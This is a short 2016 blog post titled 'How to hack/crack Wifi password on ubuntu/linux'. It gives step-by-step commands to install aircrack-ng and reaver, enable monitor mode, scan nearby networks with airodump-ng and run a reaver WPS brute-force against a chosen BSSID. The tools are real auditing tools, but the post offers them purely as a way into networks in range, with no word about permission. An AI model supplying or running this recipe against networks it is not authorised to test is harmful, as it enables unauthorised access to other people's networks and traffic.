Tuesday 1 March 2016

How to hack/crack Wifi password on ubuntu/linux.






Here are few step follow them.

Step 1 :
       install airmon

       sudo apt-get update
       sudo apt-get install aircrack-ng


step 2 :
       install reaver

       sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev
       wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
       tar -xzvf reaver-1.4.tar.gz
       cd reaver-1.4
       cd src
       ./configure
       make
       sudo make install




Step 3 :
       open terminal and type
       sudo airmon-ng start wlan0


       it will show you :
       Interface,chipest,driver
       (and you will see monitor mode enable on which interface ex. mon0)



step 4 :
       sudo airodump-ng mon0
       (where mon0 is your interface in which monitor mode inabled)




       it will show you bssid beacons data etc. details of currently inrange            networks.
       copy bssid and here is your finl step:





 








step 5 :

        sudo -s reaver -i mon0 -b 10:D3:8A:98:BB:E7 -vv



         now it starts cracking wpa passwords
     


No comments:

Post a Comment